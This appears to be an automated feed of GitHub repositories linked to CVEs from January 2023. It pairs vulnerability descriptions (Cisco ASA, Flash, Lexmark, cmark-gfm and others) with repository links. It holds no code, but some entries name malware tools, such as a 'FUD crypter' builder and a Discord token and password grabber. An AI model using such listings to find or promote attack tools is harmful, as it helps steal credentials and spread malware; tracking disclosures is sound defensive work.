**The Smart Call Home (SCH) implementation in Cisco ASA Software 8.2 before 8.2(5.50), 8.4 before 8.4(7.15), 8.6 before 8.6(1.14), 8.7 before 8.7(1.13), 9.0 before 9.0(4.8), and 9.1 before 9.1(5.1) allows remote attackers to bypass certificate validation via an arbitrary VeriSign certificate, aka Bug ID CSCun10916. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-3394](https://github.com/Live-Hack-CVE/CVE-2014-3394) create time: 2023-01-24T17:40:21Z

**mysqld_safe in Oracle MySQL through 5.5.51, 5.6.x through 5.6.32, and 5.7.x through 5.7.14; MariaDB; Percona Server before 5.5.51-38.2, 5.6.x before 5.6.32-78-1, and 5.7.x before 5.7.14-8; and Percona XtraDB Cluster before 5.5.41-37.0, 5.6.x before 5.6.32-25.17, and 5.7.x before 5.7.14-26.17, when using file-based logg CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-6664](https://github.com/Live-Hack-CVE/CVE-2016-6664) create time: 2023-01-24T17:40:16Z

**A vulnerability in the authentication, authorization, and accounting (AAA) security services of Cisco IOS XE Software could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device or cause an affected device to reload, resulting in a denial of service (DoS) condition. The vulnerability CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-0315](https://github.com/Live-Hack-CVE/CVE-2018-0315) create time: 2023-01-24T17:40:11Z

**Versions of the npm CLI prior to 6.13.3 are vulnerable to an Arbitrary File Write. It is possible for packages to create symlinks to files outside of thenode_modules folder through the bin field upon installation. A properly constructed entry in the package.json bin field would allow a package publisher to create a sym CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-16775](https://github.com/Live-Hack-CVE/CVE-2019-16775) create time: 2023-01-24T17:40:08Z

**Improper neutralization of special elements used in an OS command in Nagios XI 5.7.3 allows a remote, authenticated admin user to execute operating system commands with the privileges of the apache user. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-5791](https://github.com/Live-Hack-CVE/CVE-2020-5791) create time: 2023-01-24T17:40:03Z

**IBM Guardium Data Encryption (GDE) 4.0.0 and 5.0.0 prepares a structured message for communication with another component, but encoding or escaping of the data is either missing or done incorrectly. As a result, the intended structure of the message is not preserved. IBM X-Force ID: 213865. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-39027](https://github.com/Live-Hack-CVE/CVE-2021-39027) create time: 2023-01-24T17:40:29Z

**Use after free in Chrome OS Shell in Google Chrome on Chrome OS prior to 99.0.4844.51 allowed a remote attacker who convinced a user to engage in a series of user interaction to potentially exploit heap corruption via user interactions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-0808](https://github.com/Live-Hack-CVE/CVE-2022-0808) create time: 2023-01-24T17:40:35Z

**Cross-site Scripting (XSS) - Stored in GitHub repository pimcore/pimcore prior to 10.5.14. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0323](https://github.com/Live-Hack-CVE/CVE-2023-0323) create time: 2023-01-24T17:39:51Z

**Adobe Flash Player before 18.0.0.366 and 19.x through 22.x before 22.0.0.209 on Windows and OS X and before 11.2.202.632 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-4172, CVE-2016-4175, CVE-2016-417 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4182](https://github.com/Live-Hack-CVE/CVE-2016-4182) create time: 2023-01-24T15:28:33Z

**Adobe Flash Player before 18.0.0.366 and 19.x through 22.x before 22.0.0.209 on Windows and OS X and before 11.2.202.632 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-4172, CVE-2016-4175, CVE-2016-417 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4181](https://github.com/Live-Hack-CVE/CVE-2016-4181) create time: 2023-01-24T15:28:29Z

**Adobe Flash Player before 18.0.0.366 and 19.x through 22.x before 22.0.0.209 on Windows and OS X and before 11.2.202.632 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-4172, CVE-2016-4175, CVE-2016-417 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4180](https://github.com/Live-Hack-CVE/CVE-2016-4180) create time: 2023-01-24T15:28:25Z

**Adobe Flash Player before 18.0.0.366 and 19.x through 22.x before 22.0.0.209 on Windows and OS X and before 11.2.202.632 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-4172, CVE-2016-4175, CVE-2016-417 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4183](https://github.com/Live-Hack-CVE/CVE-2016-4183) create time: 2023-01-24T15:28:21Z

**A path traversal vulnerability in loader.php of CWP v0.9.8.1122 allows attackers to execute arbitrary code via a crafted POST request. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25046](https://github.com/Live-Hack-CVE/CVE-2022-25046) create time: 2023-01-24T15:28:38Z

**no description** : [vonahisec/CVE-2022-47966-Scan](https://github.com/vonahisec/CVE-2022-47966-Scan) create time: 2023-01-23T15:49:10Z

**Amano Xoffice parking solutions 7.1.3879 is vulnerable to SQL Injection. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23331](https://github.com/Live-Hack-CVE/CVE-2023-23331) create time: 2023-01-24T15:28:47Z

**cmark-gfm is GitHub's fork of cmark, a CommonMark parsing and rendering library and program in C. In versions prior 0.29.0.gfm.7, a crafted markdown document can trigger an out-of-bounds read in the `validate_protocol` function. We believe this bug is harmless in practice, because the out-of-bounds read accesses `mallo CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22485](https://github.com/Live-Hack-CVE/CVE-2023-22485) create time: 2023-01-24T15:28:43Z

**no description** : [Cardtibe/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2022](https://github.com/Cardtibe/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2022) create time: 2023-01-24T12:52:54Z

**no description** : [Cardtibe/Discord-Image-Token-Password-Grabber-Exploit-Cve-2022](https://github.com/Cardtibe/Discord-Image-Token-Password-Grabber-Exploit-Cve-2022) create time: 2023-01-24T12:52:24Z

**B2B Customer Ordering System developed by ID Software Project and Consultancy Services before version 1.0.0.347 has an authenticated Reflected XSS vulnerability. This has been fixed in the version 1.0.0.347. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4554](https://github.com/Live-Hack-CVE/CVE-2022-4554) create time: 2023-01-24T12:08:40Z

**This vulnerability allows an attacker to bypass the credentials brute-force prevention mechanism of the Embedded Web Server (interface) of more than 60 Lexmark printer models. This issue affects both username-password and PIN authentication.** : [t3l3machus/CVE-2023-22960](https://github.com/t3l3machus/CVE-2023-22960) create time: 2023-01-24T08:33:19Z

**no description** : [mutur4/CVE-2021-4034](https://github.com/mutur4/CVE-2021-4034) create time: 2023-01-24T08:29:44Z

**This is a repo to showcase the dirty pipe Linux Kernel Vulnerability.** : [mutur4/CVE-2022-0847](https://github.com/mutur4/CVE-2022-0847) create time: 2023-01-24T08:44:32Z

**Use-after-free vulnerability in Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors involving a URL. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-0898](https://github.com/Live-Hack-CVE/CVE-2013-0898) create time: 2023-01-24T06:40:56Z

**Use-after-free vulnerability in Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to databases. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-0880](https://github.com/Live-Hack-CVE/CVE-2013-0880) create time: 2023-01-24T06:40:53Z

**An issue was discovered in the DBI module before 1.632 for Perl. Using many arguments to methods for Callbacks may lead to memory corruption. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-7490](https://github.com/Live-Hack-CVE/CVE-2013-7490) create time: 2023-01-24T06:40:35Z

**Integer overflow in the padding implementation in the opus_packet_parse_impl function in src/opus_decoder.c in Opus before 1.0.2, as used in Google Chrome before 25.0.1364.97 on Windows and Linux and before 25.0.1364.99 on Mac OS X and other products, allows remote attackers to cause a denial of service (out-of-bounds CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-0899](https://github.com/Live-Hack-CVE/CVE-2013-0899) create time: 2023-01-24T06:39:48Z

**The block subsystem in the Linux kernel before 5.2 has a use-after-free that can lead to arbitrary code execution in the kernel context and privilege escalation, aka CID-c3e2219216c9. This is related to blk_mq_free_rqs and blk_cleanup_queue. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-25044](https://github.com/Live-Hack-CVE/CVE-2019-25044) create time: 2023-01-24T06:40:38Z

**QEMU 4.1.0 has a memory leak in zrle_compress_data in ui/vnc-enc-zrle.c during a VNC disconnect operation because libz is misused, resulting in a situation where memory allocated in deflateInit2 is not freed in deflateEnd. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-20382](https://github.com/Live-Hack-CVE/CVE-2019-20382) create time: 2023-01-24T06:40:24Z

**Squid before 4.9, when certain web browsers are used, mishandles HTML in the host (aka hostname) parameter to cachemgr.cgi. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-18860](https://github.com/Live-Hack-CVE/CVE-2019-18860) create time: 2023-01-24T06:40:20Z

**libImaging/FliDecode.c in Pillow before 6.2.2 has an FLI buffer overflow. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-5313](https://github.com/Live-Hack-CVE/CVE-2020-5313) create time: 2023-01-24T06:41:05Z

**A vulnerability has been identified in License Management Utility (LMU) (All versions < V2.4). The lmgrd service of the affected application is executed with local SYSTEM privileges on the server while its configuration can be modified by local users. The vulnerability could allow a local authenticated attacker to exec CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10056](https://github.com/Live-Hack-CVE/CVE-2020-10056) create time: 2023-01-24T06:41:01Z

**FontForge 20190801 has a use-after-free in SFD_GetFontMetaData in sfd.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-5395](https://github.com/Live-Hack-CVE/CVE-2020-5395) create time: 2023-01-24T06:40:49Z

**FontForge 20190801 has a heap-based buffer overflow in the Type2NotDefSplines() function in splinesave.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-5496](https://github.com/Live-Hack-CVE/CVE-2020-5496) create time: 2023-01-24T06:40:46Z

**The OpenID Connect reference implementation for MITREid Connect through 1.3.3 allows XSS due to userInfoJson being included in the page unsanitized. This is related to header.tag. The issue can be exploited to execute arbitrary JavaScript. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-5497](https://github.com/Live-Hack-CVE/CVE-2020-5497) create time: 2023-01-24T06:40:42Z

**In Symfony before versions 4.4.13 and 5.1.5, the CachingHttpClient class from the HttpClient Symfony component relies on the HttpCache class to handle requests. HttpCache uses internal headers like X-Body-Eval and X-Body-File to control the restoration of cached responses. The class was initially written with surrogate CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15094](https://github.com/Live-Hack-CVE/CVE-2020-15094) create time: 2023-01-24T06:40:31Z

**An issue was discovered in InspIRCd 2 before 2.0.29 and 3 before 3.6.0. The pgsql module contains a use after free vulnerability. When combined with the sqlauth or sqloper modules, this vulnerability can be used for remote crashing of an InspIRCd server by any user able to connect to a server. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-25269](https://github.com/Live-Hack-CVE/CVE-2020-25269) create time: 2023-01-24T06:40:28Z

**ldebug.c in Lua 5.4.0 allows a negation overflow and segmentation fault in getlocal and setlocal, as demonstrated by getlocal(3,2^31). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-24370](https://github.com/Live-Hack-CVE/CVE-2020-24370) create time: 2023-01-24T06:40:10Z

**It was found that PostgreSQL versions before 12.4, before 11.9 and before 10.14 did not properly sanitize the search_path during logical replication. An authenticated attacker could use this flaw in an attack similar to CVE-2018-1058, in order to execute arbitrary SQL command in the context of the user used for replica CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-14349](https://github.com/Live-Hack-CVE/CVE-2020-14349) create time: 2023-01-24T06:40:06Z

**It was found that some PostgreSQL extensions did not use search_path safely in their installation script. An attacker with sufficient privileges could use this flaw to trick an administrator into executing a specially crafted script, during the installation or update of such extension. This affects PostgreSQL versions CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-14350](https://github.com/Live-Hack-CVE/CVE-2020-14350) create time: 2023-01-24T06:40:02Z

**scm/define-stencil-commands.scm in LilyPond through 2.20.0, and 2.21.x through 2.21.4, when -dsafe is used, lacks restrictions on embedded-ps and embedded-svg, as demonstrated by including dangerous PostScript code. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-17353](https://github.com/Live-Hack-CVE/CVE-2020-17353) create time: 2023-01-24T06:39:59Z

**An unhandled exception in check_ignored() in apport/report.py can be exploited by a local attacker to cause a denial of service. If the mtime attribute is a string value in apport-ignore.xml, it will trigger an unhandled exception, resulting in a crash. Fixed in 2.20.1-0ubuntu2.24, 2.20.9-0ubuntu7.16, 2.20.11-0ubuntu27 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15701](https://github.com/Live-Hack-CVE/CVE-2020-15701) create time: 2023-01-24T06:39:56Z

**Artica Web Proxy 4.30.000000 allows an authenticated remote attacker to inject commands via the service-cmds parameter in cyrus.php. These commands are executed with root privileges via service_cmds_peform. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-17505](https://github.com/Live-Hack-CVE/CVE-2020-17505) create time: 2023-01-24T06:39:52Z

**This vulnerability allows remote attackers to execute arbitrary code on affected installations of Marvell QConvergeConsole 5.5.0.64. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the getFileFromURL method of the CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15645](https://github.com/Live-Hack-CVE/CVE-2020-15645) create time: 2023-01-24T06:39:45Z

**A Incorrect Default Permissions vulnerability in the packaging of inn in openSUSE Leap 15.2, openSUSE Tumbleweed, openSUSE Leap 15.1 allows local attackers with control of the new user to escalate their privileges to root. This issue affects: openSUSE Leap 15.2 inn version 2.6.2-lp152.1.26 and prior versions. openSUSE CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-8026](https://github.com/Live-Hack-CVE/CVE-2020-8026) create time: 2023-01-24T06:39:42Z

**This vulnerability allows remote attackers to execute arbitrary code on affected installations of Marvell QConvergeConsole 5.5.0.64. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the saveAsText method of the GWTT CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15643](https://github.com/Live-Hack-CVE/CVE-2020-15643) create time: 2023-01-24T06:39:38Z

**In InvoicePlane 1.5.11 a misconfigured web server allows unauthenticated directory listing and file download. Allowing an attacker to directory traversal and download files suppose to be private without authentication. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-29024](https://github.com/Live-Hack-CVE/CVE-2021-29024) create time: 2023-01-24T06:40:17Z

**OS Command injection vulnerability in sleuthkit fls tool 4.11.1 allows attackers to execute arbitrary commands via a crafted value to the m parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45639](https://github.com/Live-Hack-CVE/CVE-2022-45639) create time: 2023-01-24T06:40:13Z

**cmark-gfm is GitHub's fork of cmark, a CommonMark parsing and rendering library and program in C. Versions prior to 0.29.0.gfm.7 are subject to a polynomial time complexity issue in cmark-gfm that may lead to unbounded resource exhaustion and subsequent denial of service. This vulnerability has been patched in 0.29.0.g CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22484](https://github.com/Live-Hack-CVE/CVE-2023-22484) create time: 2023-01-24T02:08:43Z

**cmark-gfm is GitHub's fork of cmark, a CommonMark parsing and rendering library and program in C. Versions prior to 0.29.0.gfm.7 are subject to several polynomial time complexity issues in cmark-gfm that may lead to unbounded resource exhaustion and subsequent denial of service. Various commands, when piped to cmark-gf CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22483](https://github.com/Live-Hack-CVE/CVE-2023-22483) create time: 2023-01-24T02:08:40Z

**Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2023-21795. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21796](https://github.com/Live-Hack-CVE/CVE-2023-21796) create time: 2023-01-24T02:08:36Z

**Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2023-21796. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21795](https://github.com/Live-Hack-CVE/CVE-2023-21795) create time: 2023-01-24T02:08:32Z

**Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21775](https://github.com/Live-Hack-CVE/CVE-2023-21775) create time: 2023-01-24T02:08:29Z

**Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21719](https://github.com/Live-Hack-CVE/CVE-2023-21719) create time: 2023-01-24T02:08:25Z

**** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was in a CNA pool that was not assigned to any issues during 2018. Notes: none. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-20104](https://github.com/Live-Hack-CVE/CVE-2018-20104) create time: 2023-01-23T23:57:38Z

**Simple iOS bootlooper using CVE-2022-46689.** : [BomberFish/JailedCement](https://github.com/BomberFish/JailedCement) create time: 2023-01-23T23:58:00Z

**A vulnerability in the descarga_etiqueta.php component of Correos Prestashop 1.7.x allows attackers to execute a directory traversal. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46639](https://github.com/Live-Hack-CVE/CVE-2022-46639) create time: 2023-01-23T23:57:50Z

**Cross-Site Scripting (XSS) vulnerability found in Rawchen blog-ssm v1.0 allows attackers to execute arbitrary code via the 'notifyInfo' parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40034](https://github.com/Live-Hack-CVE/CVE-2022-40034) create time: 2023-01-23T23:57:46Z

**Western Digital has identified a weakness in the UFS standard that could result in a security vulnerability. This vulnerability may exist in some systems where the Host boot ROM code implements the UFS Boot feature to boot from UFS compliant storage devices. The UFS Boot feature, as specified in the UFS standard, is pr CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23005](https://github.com/Live-Hack-CVE/CVE-2022-23005) create time: 2023-01-23T23:57:42Z

**In certain Lexmark products through 2023-01-12, SSRF can occur because of a lack of input validation. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23560](https://github.com/Live-Hack-CVE/CVE-2023-23560) create time: 2023-01-23T23:58:02Z

**Lexmark products through 2023-01-10 have Improper Control of Interaction Frequency. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22960](https://github.com/Live-Hack-CVE/CVE-2023-22960) create time: 2023-01-23T23:57:58Z

**IzyBat Orange casiers before 20221102_1 allows SQL Injection via a getCasier.php?taille= URI. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22630](https://github.com/Live-Hack-CVE/CVE-2023-22630) create time: 2023-01-23T23:57:54Z

**An issue was discovered in Nim before 1.6.2. The RST module of the Nim language stdlib, as used in NimForum and other products, permits the javascript: URI scheme and thus can lead to XSS in some applications. (Nim versions 1.6.2 and later are fixed; there may be backports of the fix to some earlier versions. NimForum CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-46872](https://github.com/Live-Hack-CVE/CVE-2021-46872) create time: 2023-01-23T21:45:03Z

**Tiki through 25.0 allows CSRF attacks that are related to tiki-importer.php and tiki-import_sheet.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22852](https://github.com/Live-Hack-CVE/CVE-2023-22852) create time: 2023-01-23T21:45:21Z

**Tiki before 24.1, when feature_create_webhelp is enabled, allows lib/structures/structlib.php PHP Object Injection because of an eval. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22853](https://github.com/Live-Hack-CVE/CVE-2023-22853) create time: 2023-01-23T21:45:17Z

**DENX U-Boot through 2018.09-rc1 has a remotely exploitable buffer overflow via a malicious TFTP server because TFTP traffic is mishandled. Also, local exploitation can occur via a crafted kernel image. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-18439](https://github.com/Live-Hack-CVE/CVE-2018-18439) create time: 2023-01-23T19:33:33Z

**A cross-site scripting (XSS) vulnerability in Employee Service Center (esc) and Service Portal (sp) in ServiceNow Quebec, Rome, and San Diego allows remote attackers to inject arbitrary web script via the Standard Ticket Conversations widget. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42704](https://github.com/Live-Hack-CVE/CVE-2022-42704) create time: 2023-01-23T19:33:38Z

**NVIDIA BMC contains a vulnerability in IPMI handler, where an unauthorized attacker can use certain oracles to guess a valid BMC username, which may lead to an information disclosure. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42288](https://github.com/Live-Hack-CVE/CVE-2022-42288) create time: 2023-01-23T19:33:11Z

**A flaw was found in Keycloak. This flaw allows impersonation and lockout due to the email trust not being handled correctly in Keycloak. An attacker can shadow other users with the same email and lockout or impersonate them. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0105](https://github.com/Live-Hack-CVE/CVE-2023-0105) create time: 2023-01-23T19:33:49Z

**A vulnerability was found in ityouknow favorites-web. It has been rated as problematic. Affected by this issue is some unknown functionality of the component Comment Handler. The manipulation leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0287](https://github.com/Live-Hack-CVE/CVE-2023-0287) create time: 2023-01-23T19:33:44Z

**RSSHub is an open source RSS feed generator. RSSHub is vulnerable to Server-Side Request Forgery (SSRF) attacks. This vulnerability allows an attacker to send arbitrary HTTP requests from the server to other servers or resources on the network. An attacker can exploit this vulnerability by sending a request to the affe CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22493](https://github.com/Live-Hack-CVE/CVE-2023-22493) create time: 2023-01-23T19:33:26Z

**Docker container vulnerabilities exploiting CVE-2019-5736** : [GiovanniCrudo00/Docker-Vulnerabilities-CVE-2019-5736-](https://github.com/GiovanniCrudo00/Docker-Vulnerabilities-CVE-2019-5736-) create time: 2023-01-23T19:04:56Z

**Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authentica CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-16299](https://github.com/Live-Hack-CVE/CVE-2017-16299) create time: 2023-01-23T17:22:35Z

**Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authentica CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-16297](https://github.com/Live-Hack-CVE/CVE-2017-16297) create time: 2023-01-23T17:22:31Z

**Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authentica CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-16298](https://github.com/Live-Hack-CVE/CVE-2017-16298) create time: 2023-01-23T17:22:26Z

**Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authentica CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-16296](https://github.com/Live-Hack-CVE/CVE-2017-16296) create time: 2023-01-23T17:22:21Z

**Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authentica CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-16295](https://github.com/Live-Hack-CVE/CVE-2017-16295) create time: 2023-01-23T17:22:18Z

**neo4j-contrib neo4j-apoc-procedures version before commit 45bc09c contains a XML External Entity (XXE) vulnerability in XML Parser that can result in Disclosure of confidential data, denial of service, SSRF, port scanning. This vulnerability appears to have been fixed in after commit 45bc09c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-1000820](https://github.com/Live-Hack-CVE/CVE-2018-1000820) create time: 2023-01-23T17:23:07Z

**An integer overflow in the RFC3164 parser in One Identity syslog-ng 3.0 through 3.37 allows remote attackers to cause a Denial of Service via crafted syslog input that is mishandled by the tcp or network function. syslog-ng Premium Edition 7.0.30 and syslog-ng Store Box 6.10.0 are also affected. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38725](https://github.com/Live-Hack-CVE/CVE-2022-38725) create time: 2023-01-23T17:23:01Z

**Helmet Store Showroom Site v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /hss/classes/Users.php?f=delete. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46472](https://github.com/Live-Hack-CVE/CVE-2022-46472) create time: 2023-01-23T17:22:51Z

**Alotcer - AR7088H-A firmware version 16.10.3 Information disclosure. Unspecified error message contains the default administrator user name. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46371](https://github.com/Live-Hack-CVE/CVE-2022-46371) create time: 2023-01-23T17:22:47Z

**The Forgotten Password functionality of Rocket TRUfusion Portal v7.9.2.1 allows remote attackers to bypass authentication and access restricted pages by validating the user's session token when the "Password forgotten?" button is clicked. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25027](https://github.com/Live-Hack-CVE/CVE-2022-25027) create time: 2023-01-23T17:22:38Z

**Alotcer - AR7088H-A firmware version 16.10.3 Command execution Improper validation of unspecified input field may allow Authenticated command execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46372](https://github.com/Live-Hack-CVE/CVE-2022-46372) create time: 2023-01-23T17:22:14Z

**** DISPUTED ** Insecure folder permissions in the Windows installation path of Shibboleth Service Provider (SP) before 3.4.1 allow an unprivileged local attacker to escalate privileges to SYSTEM via DLL planting in the service executable's folder. This occurs because the installation goes under C:\opt (rather than C:\P CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22947](https://github.com/Live-Hack-CVE/CVE-2023-22947) create time: 2023-01-23T17:23:23Z

**Adobe InDesign version 18.0 (and earlier), 17.4 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim mus CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21592](https://github.com/Live-Hack-CVE/CVE-2023-21592) create time: 2023-01-23T17:23:19Z

**Adobe InDesign version 18.0 (and earlier), 17.4 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim mus CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21591](https://github.com/Live-Hack-CVE/CVE-2023-21591) create time: 2023-01-23T17:23:15Z

**Adobe InDesign version 18.0 (and earlier), 17.4 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21590](https://github.com/Live-Hack-CVE/CVE-2023-21590) create time: 2023-01-23T17:23:11Z

**InHand Networks InRouter 302, prior to version IR302 V3.5.56, and InRouter 615, prior to version InRouter6XX-S-V2.3.0.r5542, contain vulnerability CWE-319: Cleartext Transmission of Sensitive Information. They use an unsecured channel to communicate with the cloud platform by default. An unauthorized user could interce CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22597](https://github.com/Live-Hack-CVE/CVE-2023-22597) create time: 2023-01-23T17:22:44Z

**Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository healthchecks/healthchecks prior to v2.6. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0440](https://github.com/Live-Hack-CVE/CVE-2023-0440) create time: 2023-01-23T16:16:46Z

**Cross-Site Request Forgery (CSRF) in GitHub repository modoboa/modoboa prior to 2.0.4. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0438](https://github.com/Live-Hack-CVE/CVE-2023-0438) create time: 2023-01-23T16:16:42Z

**Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authentica CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-16322](https://github.com/Live-Hack-CVE/CVE-2017-16322) create time: 2023-01-23T14:02:59Z

